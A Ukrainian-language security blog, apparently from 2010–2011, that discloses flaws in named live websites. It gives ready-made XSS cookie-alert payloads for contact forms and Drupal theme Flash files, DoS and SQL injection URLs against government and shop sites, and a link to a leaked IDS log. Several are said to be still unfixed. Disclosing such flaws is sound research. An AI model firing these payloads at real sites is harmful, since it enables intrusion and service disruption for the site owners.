Websecurity - Веб безпека

08.01.2011

У жовтні, 15.10.2010, я знайшов Insufficient Anti-automation та Cross-Site Scripting уразливості на http://scb-ua.com - сайті секюріті компанії. Про що найближчим часом сповіщу адміністрацію сайта.

Раніше я вже писав про уразливості на www.scb-ua.com.

Детальна інформація про уразливості з’явиться пізніше.

05.10.2011

Insufficient Anti-automation:

На сторінці контактів (http://scb-ua.com/_kontakty_i_karta_proezda_0_11_menu_0_1.html) немає захисту від автоматизованих запитів (капчі).

XSS:

POST запит на сторінці http://scb-ua.com/_kontakty_i_karta_proezda_0_11_menu_0_1.html
<script>alert(document.cookie)</script>В полях: ФИО, E-mail, Телефон, Тема письма, Текст.

Зараз даний сайт, який належить секюріті фірмі, не працює (мабуть вони вірішили, що найбільш безпечно взагалі не мати сайта). А на домені scb-ua.com знаходиться зовсім інший сайт, в якому дірок також вистачає .

В даній добірці уразливості в веб додатках:

• SAP WebAS ITS Mobile Test Service Multiple Vulnerabilities (деталі)
• Path disclosure in PrestaShop (деталі)
• SAP WebAS ITS Mobile Start Service Multiple Vulnerabilities (деталі)
• TOTVS ERP Microsiga Protheus - Users Enumeration (деталі)
• Proofpoint Protection Server Cross-Site Scripting Vulnerability (деталі)
• LMS Web Ensino - Multiple XSS, Session Fixation, CSRF and SQL Injection (деталі)
• Client Side Authorization ZyXEL ZyWALL USG Appliances Web Interface (деталі)
• ‘Quick Polls’ Local File Inclusion & Deletion Vulnerabilities (деталі)
• Authentication Bypass in Configuration Import and Export of ZyXEL ZyWALL USG Appliances (деталі)
• XSS in CubeCart <= 2.0.7 (деталі)

07.01.2011

У жовтні, 15.10.2010, я знайшов Insufficient Anti-automation та Cross-Site Scripting уразливості на http://varta.net.ua - сайті секюріті компанії. Про що найближчим часом сповіщу адміністрацію сайта.

Раніше я вже писав про уразливість на varta.net.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

04.10.2011

Insufficient Anti-automation:

На сторінці контактів (http://varta.net.ua/index.php?lang_id=1 &menu_id=8) немає захисту від автоматизованих запитів (капчі).

XSS:

POST запит на сторінці http://varta.net.ua/index.php?lang_id=1&menu_id=8
<script>alert(document.cookie)</script>В полях: ФИО, E-mail, Телефон, Тема письма, Текст.

Дані уразливості досі не виправлені.

В даній добірці уразливості в веб додатках:

• HP Network Automation Running on Linux, Solaris, and Windows, Remote Information Disclosure (деталі)
• Path disclosure in Tribiq CMS (деталі)
• HP OpenView Storage Data Protector, Remote Execution of Arbitrary Code (деталі)
• XSS vulnerability in xtcModified (деталі)
• Cisco Unified CallManager xmldirectorylist.jsp SQL Injection Vulnerability (деталі)
• XSS vulnerability in xtcModified (деталі)
• Cisco Security Advisory: Multiple Vulnerabilities in Cisco Unified Communications Manager (деталі)
• XSS vulnerability in xtcModified (деталі)
• RSA, The Security Division of EMC, announces a fix for a security vulnerability in RSA Data Loss Prevention (деталі)
• XSS vulnerability in xtcModified (деталі)

Раніше я вже писав про уразливість в плагінах для Serendipity, Social Web CMS, PHP-Fusion, Magento та Sweetcron. А також писав про аналогічну уразливість в багатьох плагінах для різних движків, в тому числі в Cumulus для Drupal.

Така ж уразливість є і в багатьох темах для Drupal, що використовують cumulus.swf (це той самий файл tagcloud.swf розроблений автором WP-Cumulus). Про мільйони флешек tagcloud.swf вразливих до XSS атак я згадував у своїй статті XSS уразливості в 34 мільйонах флеш файлах.

Сьогодні я знайшов Cross-Site Scripting уразливість в багатьох темах для Drupal. Зокрема вразливі теми Admire Grunge, Morok, Pushbutton, Danland і Analytic. Всі теми для Друпал (як і для інших движків), що використовують дану флешку, є вразливими. Про що найближчим часом повідомлю розробникам.

XSS:

http://site/themes/admire_grunge/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
http://site/themes/morok/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
http://site/themes/pushbutton/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
http://site/sites/all/themes/danland/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
http://site/themes/analytic/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Код виконається при кліку. Це Strictly social XSS. Також можна провести HTML Injection атаку, подібно до WP-Cumulus.

Уразливі всі версії тем Admire Grunge, Morok, Pushbutton, Danland і Analytic для Drupal.

04.01.2011

У вересні, 21.09.2010, я знайшов Full path disclosure та Information Leakage уразливості на хакерському сайті http://www.hackerscenter.com. Про що найближчим часом сповіщу адміністрацію сайта.

Раніше я вже писав про уразливості на www.hackerscenter.com.

Детальна інформація про уразливості з’явиться пізніше.

01.10.2011

Full path disclosure:

http://www.hackerscenter.com/index.php?/component/option,com_mailto/link,='

Та інші “атакуючі” запити до сайта (такі як з одинарною лапкою).

http://www.hackerscenter.com/hscids/lib/IDS/Log/File.php

Information Leakage:

http://www.hackerscenter.com/hscids/lib/IDS/tmplogs/phpids_log.txt

Витік всього лога.

Дані уразливості досі не виправлені.

23.12.2010

У вересні, 11.09.2010, я знайшов Denial of Service уразливість на http://www.kvs.gov.ua - сайті Державного департаменту України з питань виконання покарань. Також подібну уразливість я виявив на державних сайтах www.dcz.gov.ua та www.kmu.gov.ua. Про що найближчим часом сповіщу адміністрацію сайта.

Раніше я вже писав про уразливості на kvs.gov.ua, www.dcz.gov.ua та www.kmu.gov.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

30.09.2011

DoS:

http://www.kvs.gov.ua/punish/cewolf?img=1&width=10000&height=10000
http://www.dcz.gov.ua/chn/cewolf?img=1&width=10000&height=10000
http://www.kmu.gov.ua/punish/cewolf?img=1&width=10000&height=10000

На сайтах Державного департаменту України з питань виконання покарань (www.kvs.gov.ua) та Кабінету Міністрів України (www.kmu.gov.ua) дана уразливість вже виправлена. Але не на сайті Державної служби зайнятості України (www.dcz.gov.ua). А також є ще багато інших уразливих сайтів (включаючи gov.ua сайти) на дірявому Megapolis.Portal Manager.

В даній добірці уразливості в веб додатках:

• HP Insight Control for Linux (IC-Linux), Remote Unauthorized Elevation of Privilege, Execution of Arbitrary Code, Encryption Downgrade, Information Disclosure, Denial of Service (DoS) (деталі)
• CubeCart 2.0.6 SQL injection / Cross Site Scripting (деталі)
• Cross-site scripting (XSS) vulnerabilities in KDE-Libs (деталі)
• Prestashop Cartium 1.3.3 Multiple Cross Site Scripting (XSS) (деталі)
• HP Proliant Support Pack (PSP) Running on Linux and Windows, Remote Cross Site Scripting (XSS), URL Redirection, Information Disclosure (деталі)
• XSRF (CSRF) in Pragyan CMS (деталі)
• HP System Management Homepage (SMH) for Linux and Windows, Remote Unauthorized Access, Execution of Arbitrary Code, Denial of Service (DoS) (деталі)
• XSS vulnerability in Pragyan CMS (деталі)
• Security Notice for CA Arcot WebFort Versatile Authentication Server (деталі)
• XSS vulnerability in Pragyan CMS (деталі)

22.12.2010

У серпні, 26.08.2010, я знайшов SQL Injection уразливість на сайті http://citycom.ua (онлайн магазин). Про що найближчим часом сповіщу адміністрацію сайта.

Раніше я вже писав про уразливості на citycom.ua. Стосовно дірок на сайтах онлайн магазинів в останнє я писав про уразливості на www.foxtrot.com.ua.

Детальна інформація про уразливість з’явиться пізніше.

29.09.2011

SQL Injection:

http://citycom.ua/search/?sort=desc&q='/**/and/**/version()=5.1/**/limit/**/0,1%23

Зараз змінили домен з http://citycom.ua на http://city.com.ua.

Дана уразливість вже виправлена. Лише треба не зубувати дякувати людям, що дбають про безпеку вашого сайта (що неодноразово траплялося з адмінами citycom.ua).

07.12.2010

У серпні, 12.08.2010, я знайшов Denial of Service та Insufficient Anti-automation уразливості на сайті http://www.foxtrot.com.ua (онлайн магазин). Про що найближчим часом сповіщу адміністрацію сайта.

Стосовно дірок на сайтах онлайн магазинів в останнє я писав про уразливості на kshop.com.ua.

Детальна інформація про уразливості з’явиться пізніше.

28.09.2011

DoS:

http://www.foxtrot.com.ua/ressearch.aspx?page=1&search=%25%25%25

Insufficient Anti-automation:

http://www.foxtrot.com.ua/feedbacks.aspx

В даній формі немає захисту від автоматизованих запитів (капчі).

Дані уразливості так і не були виправлені. А зараз даний сайт не працює, тому що він закритий по політичним мотивам.